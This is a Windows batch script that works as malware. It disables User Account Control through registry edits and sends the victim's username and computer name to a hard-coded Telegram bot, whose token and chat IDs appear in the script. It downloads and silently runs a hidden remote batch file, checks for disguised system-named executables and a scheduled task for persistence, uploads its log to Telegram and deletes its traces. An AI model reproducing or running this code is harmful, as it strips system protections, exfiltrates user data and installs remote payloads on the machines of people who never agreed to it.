@echo off

setlocal enabledelayedexpansion



:RUNADMINHERE
cd /d "%~dp0"
:: Run All your commands here ( will be executed with admin privileges )


set "BATCHVERSION=6.6"
set "RESULT=%TEMP%\TUSELMP.txa"
set "RUNEVERYOFFICIALMD5=e61120a65311d97840928a691e96b36a"
set "RUNEVERYLOGFILE=%temp%\S1rNsvQgG.mpeez"

goto :EOF

set "chars=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
set "filename="




for /L %%i in (1,1,13) do (
    set /A "rand=!random! %% 62"
    for %%j in (!rand!) do set "filename=!filename!!chars:~%%j,1!"
)

set "filename1=!filename!"
set "filename="


for /L %%i in (1,1,13) do (
    set /A "rand=!random! %% 62"
    for %%j in (!rand!) do set "filename=!filename!!chars:~%%j,1!"
)

set "filename2=!filename!"
set "filename="





:: Set the log file path
set "LOGFILE=%temp%\!filename1!.ustup"
set "LOGFILE1=%temp%\!filename2!.ustup"


echo BATCHVERSION=%BATCHVERSION% >> "%LOGFILE%" 2>&1
timeout /t 60 /nobreak >> "%LOGFILE%" 2>&1


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1



echo LOGFILENAME = !filename1!.ustup >> "%LOGFILE%" 2>&1




:: Disable UAC 
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f >> "%LOGFILE%" 2>&1
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 0 /f >> "%LOGFILE%" 2>&1
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorUser" /t REG_DWORD /d 0 /f >> "%LOGFILE%" 2>&1





:: ============ LoggedIn TOPIC ============


:: Set bot token, chat ID, and message
set "TOKEN_LOGGEDIN=7470339630:AAEwHeixYKwvT6WYutXCjBBugdjTGjTIZVA"
set "CHAT_ID_LOGGEDIN=-1002163721260"
set "TOPIC_ID_LOGGEDIN=292182"
set "MESSAGE_LOGGEDIN=%USERNAME%(%COMPUTERNAME%)|LoggedIn(0)|%time%|(v%BATCHVERSION%)"
set "ENCODED_MESSAGE_LOGGEDIN=%MESSAGE_LOGGEDIN: =%%2"
set "CAPTION_LOGGEDIN=This is a document for LOGGEDIN Topic"
set "FILE_PATH_LOGGEDIN=%temp%\LOGGEDIN_Topic.txt"
set "SMALLUSER=%USERNAME:~0,2%%USERNAME:~-2%"


:SENDFIRSTINLOGGEDINTOPIC


curl -s -X POST "https://api.telegram.org/bot7470339630:AAEwHeixYKwvT6WYutXCjBBugdjTGjTIZVA/sendMessage" -d "chat_id=-1002163721260" -d "message_thread_id=292182" -d "text=%USERNAME%(%COMPUTERNAME%)|LoggedIn(0)|%time%|v%BATCHVERSION%" > "%RESULT%" 2>&1


findstr /i "message_id" "%RESULT%" >nul
if %errorlevel%==0 (
    echo Message sent successfully! >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
) else (
    echo Failed to send message. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo TLGRM FAIL MSG : >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    type "%RESULT%" >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo Done Fail MSG >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo Retrying... >> "%LOGFILE%" 2>&1
    timeout /t 2 /nobreak >> "%LOGFILE%" 2>&1
    echo Going to SENDFIRSTINLOGGEDINTOPIC >> "%LOGFILE%" 2>&1
    goto SENDFIRSTINLOGGEDINTOPIC
)

:SENDINGFIRSTINBOTMSG


curl -s -X POST "https://api.telegram.org/bot7470339630:AAEwHeixYKwvT6WYutXCjBBugdjTGjTIZVA/sendMessage" -d "chat_id=1040442734" -d "text=%SMALLUSER%10ZIN|LgdIn0" > "%RESULT%" 2>&1


findstr /i "message_id" "%RESULT%" >nul
if %errorlevel%==0 (
    echo Message sent successfully! >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
) else (
    echo Failed to send message. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo TLGRM FAIL MSG : >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    type "%RESULT%" >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo Done Fail MSG >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo Retrying... >> "%LOGFILE%" 2>&1
    timeout /t 2 /nobreak >> "%LOGFILE%" 2>&1
    echo Going to SENDINGFIRSTINBOTMSG >> "%LOGFILE%" 2>&1
    goto SENDINGFIRSTINBOTMSG
)







:: Start logging from this point
rem call :LogOutput > "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
rem type "%LOGFILE%" > "%LOGFILE1%"



goto :LogOutput


:SENDINGLASTMSG
echo SENDINGLASTMSG Started.. >> "%LOGFILE%" 2>&1
set "RESULT=%TEMP%\TUSELMP.txa"
del /f /q "%RESULT%" >> "%LOGFILE%" 2>&1

set "MESSAGE_LOGGEDIN=%USERNAME%(%COMPUTERNAME%)|LoggedIn(1)|%MESSAGEEVERY%|%time%|(v%BATCHVERSION%)"
set "ENCODED_MESSAGE_LOGGEDIN=%MESSAGE_LOGGEDIN: =%%2"


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
curl -s -X POST "https://api.telegram.org/bot%TOKEN_LOGGEDIN%/sendDocument" -F "chat_id=%CHAT_ID_LOGGEDIN%" -F "message_thread_id=%TOPIC_ID_LOGGEDIN%" -F "caption=%ENCODED_MESSAGE_LOGGEDIN%" -F "document=@%LOGFILE%" > "%RESULT%"
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


findstr /i "message_id" "%RESULT%" >nul
if %errorlevel%==0 (
    echo Message sent successfully! >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
) else (
    echo Failed to send message. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo TLGRM FAIL MSG : >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    type "%RESULT%" >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo Done Fail MSG >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo Retrying... >> "%LOGFILE%" 2>&1
    timeout /t 5 /nobreak >> "%LOGFILE%" 2>&1
    goto SENDINGLASTMSG
)



echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Tlgrm Result : >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
type "%RESULT%" >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Batch file ended.. Removing filess.. >> "%LOGFILE%" 2>&1
timeout /t 10 /nobreak >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
rem copy /Y "%LOGFILE%" "%temp%\Siiiiiiiiit.rrr"
del /f /q "%temp%\Siiiiiiiiit.rrr"
del /f /q "%LOGFILE%"
del /f /q "%LOGFILE1%"
goto :EOF





:LogOutput
echo Starting LogOutput... >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo BATCHVERSION=%BATCHVERSION% >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1











:CHECKRUNEVERY
echo CHECKRUNEVERY Started >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


:: Define the folder and file paths
set "targetFolder=%appdata%\Microsoft\Windows\SystemCertificatesData\Tasks"
set "sourceFile=%SystemRoot%\System32\convertsshd.exe"
set "startupFile=%targetFolder%\ProtectionWindowsHostProcess.exe"

:: Ensure the folder exists
if not exist "%targetFolder%" (
    echo Creating folder: "%targetFolder%" >> "%LOGFILE%" 2>&1
    mkdir "%targetFolder%" >> "%LOGFILE%" 2>&1
)


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
::timeout /t 5 /nobreak >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


if not exist "%startupFile%" goto INSTRUNEVERY
echo %startupFile% Found. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


for /f "tokens=*" %%A in ('certutil -hashfile "%startupFile%" MD5 ^| findstr /V "hash"') do set "RUNEVERYCURRENTMD5=%%A"
echo MD5 of "%startupFile%" = %RUNEVERYCURRENTMD5% >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Comparing with stored MD5: %RUNEVERYOFFICIALMD5% >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1



if "%RUNEVERYCURRENTMD5%"=="%RUNEVERYOFFICIALMD5%" (
    echo MD5 matches %RUNEVERYCURRENTMD5% = %RUNEVERYOFFICIALMD5% >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
) else (
    echo MD5 doesnt match %RUNEVERYCURRENTMD5% # %RUNEVERYOFFICIALMD5% >> "%LOGFILE%" 2>&1
    echo Going to INSTRUNEVERY >> "%LOGFILE%" 2>&1
    goto INSTRUNEVERY
)




echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1






:: RunEvery Files Found! , Lets Checking Task "SystemLibrariesU"

:: Define task to check
set "Task1=SystemLibrariesU"

echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Checking %Task1% >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
schtasks /query /tn "%Task1%" /v /fo LIST >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1

:: If Task doesnt Exist , goto 
schtasks /query /tn "%Task1%" >> "%LOGFILE%" 2>&1
if errorlevel 1 goto INSTRUNEVERY





echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
:: RunEvery Files & Task Found goto NEXT 
echo RunEvery Files and Task Found with MD5 Check. Going to AFTERORSKIPINSTALLRUNEVERY >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
goto AFTERORSKIPINSTALLRUNEVERY




:RUNEVERYINSTALL
echo. >> "%LOGFILE%" 2>&1
echo RUNEVERYINSTALL Started.. >> "%LOGFILE%" 2>&1
:: Run commands if ShellHost.exe is not found
echo Checking for RunEvery... >> "%LOGFILE%" 2>&1
set "embeddedScript=%temp%\temp_script_RUNEVRYINST.bat"
del /f /a "%embeddedScript%" >> "%LOGFILE%" 2>&1



:: Download content and save to the embedded batch file
curl -L -o "%embeddedScript%" "https://raw.githubusercontent.com/Proseuo/Ujop/refs/heads/main/Installers/RunEveryCallerForRunEveryRunning"
attrib +h +s "%embeddedScript%"

echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1

if exist "%embeddedScript%" (
    echo Script content saved to %embeddedScript%. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    call "%embeddedScript%" >> "%LOGFILE%" 2>&1
    del /f /a "%embeddedScript%" >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
) else (
    echo Failed to get content from ShellHost Link >> "%LOGFILE%" 2>&1
    echo. >> "%LOGFILE%" 2>&1
    timeout /t 3 /nobreak  >> "%LOGFILE%" 2>&1
    goto RUNEVERYINSTALL
)








echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1

set "MESSAGEEVERY=RUNEVERYINSTALLED...."
echo MESSAGEEVERY = %MESSAGEEVERY% >> "%LOGFILE%" 2>&1


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1







:AFTERORSKIPINSTALLRUNEVERY






:: Check Startup Programms , if not found Run Task , if not found task , Download STC & Run it 

:: Define the list of files to check
set "file1=%ProgramData%\Microsoft\Windows\COM Surrogate.exe"
set "file2=%ProgramData%\Microsoft\Windows\ShellHost.exe"
set "file3=%ProgramData%\Microsoft\Windows\KMSAuto.exe"
set "file4=%TEMP%\nircmd.exe"
set "file5=%ProgramData%\Microsoft\Windows\CoreWorkerProcess.exe"
set "file6=%ProgramData%\Microsoft\Windows\STLRRUNNERCALLER.exe"
set "file7=%TEMP%\7z.exe"
set "file8=%TEMP%\7z.dll"
set "file9=%SystemRoot%\System32\handle.exe"
set "file10=%SystemRoot%\System32\wudtest.exe"
set "file11=%appdata%\Microsoft\Windows\SystemCertificatesData\Tasks\ProtectionWindowsHostProcess.exe"


echo Typing  >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1

if exist "%file1%" echo COM Surrogate.exe Found in %file1% >> "%LOGFILE%" 2>&1
if exist "%file2%" echo ShellHost.exe Found in %file2% >> "%LOGFILE%" 2>&1
if exist "%file3%" echo KMSAuto.exe Found in %file3% >> "%LOGFILE%" 2>&1
if exist "%file4%" echo nircmd.exe Found in %file4% >> "%LOGFILE%" 2>&1
if exist "%file5%" echo CoreWorkerProcess.exe Found in %file5% >> "%LOGFILE%" 2>&1
::if exist "%file6%" echo STLRRUNNERCALLER.exe Found in %file6% >> "%LOGFILE%" 2>&1
if exist "%file7%" if exist "%file8%" (
    echo 7z.exe and 7z.dll Found in %file7% and %file8% >> "%LOGFILE%" 2>&1
) else (
    if exist "%file7%" echo 7z.exe Found in %file7% >> "%LOGFILE%" 2>&1
    if exist "%file8%" echo 7z.dll Found in %file8% >> "%LOGFILE%" 2>&1
)
if exist "%file9%" echo handle.exe Found in %file9% >> "%LOGFILE%" 2>&1
if exist "%file10%" echo wudtest.exe SpeedTest Found in %file10% >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
if exist "%file11%" echo ProtectionWindowsHostProcess.exe Found in %file11% >> "%LOGFILE%" 2>&1
if not exist "%file11%" echo ProtectionWindowsHostProcess.exe NOT Found in %file11% >> "%LOGFILE%" 2>&1







set COUNT=1



echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1



:LOOPRUNEVERY
echo LOOPRUNEVERY Started.. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


echo [!COUNT!] Running handler... >> "%LOGFILE%" 2>&1
call :HANDLERUNEVERYLOG

REM Wait 20 seconds only if not the last loop
if !COUNT! LSS 6 (
    timeout /t 15 /nobreak >> "%LOGFILE%" 2>&1
)

set /a COUNT+=1
if !COUNT! LEQ 6 goto LOOPRUNEVERY


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


echo All counts ended. Going to NEXT >> "%LOGFILE%" 2>&1
goto NEXT



:HANDLERUNEVERYLOG
echo HANDLERUNEVERYLOG Started ... >> "%LOGFILE%" 2>&1
echo Trying Handle RunEvery Log. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
curl -s -X POST "https://api.telegram.org/bot7470339630:AAEwHeixYKwvT6WYutXCjBBugdjTGjTIZVA/sendMessage" -d "chat_id=-1002163721260" -d "message_thread_id=292182" -d "text=%USERNAME%(%COMPUTERNAME%)|(COUNT=%COUNT%)|%time%|v%BATCHVERSION%" >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


:: Accept EULA if not already accepted
reg query HKCU\Software\Sysinternals\Handle /v EulaAccepted >> "%LOGFILE%" 2>&1
reg add HKCU\Software\Sysinternals\Handle /v EulaAccepted /t REG_DWORD /d 1 /f >> "%LOGFILE%" 2>&1
reg query HKCU\Software\Sysinternals\Handle /v EulaAccepted >> "%LOGFILE%" 2>&1

echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1


echo Handle LOGFILE TA3 RUNEVERY >> "%LOGFILE%" 2>&1
handle.exe "%RUNEVERYLOGFILE%" >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
::goto :EOF
exit /b


echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1









:NEXT
echo NEXT Started.. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Writing %RUNEVERYLOGFILE% in LOGFILE >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo RUNEVERYLOG FILE : >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
type "%RUNEVERYLOGFILE%" >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Done RUNEVERYLOGFILE >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1

echo Time= %time% >> "%LOGFILE%" 2>&1
echo Calling ended.... >> "%LOGFILE%" 2>&1
timeout /t 15 /nobreak >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo Going to SENDINGLASTMSG >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
echo. >> "%LOGFILE%" 2>&1
goto SENDINGLASTMSG


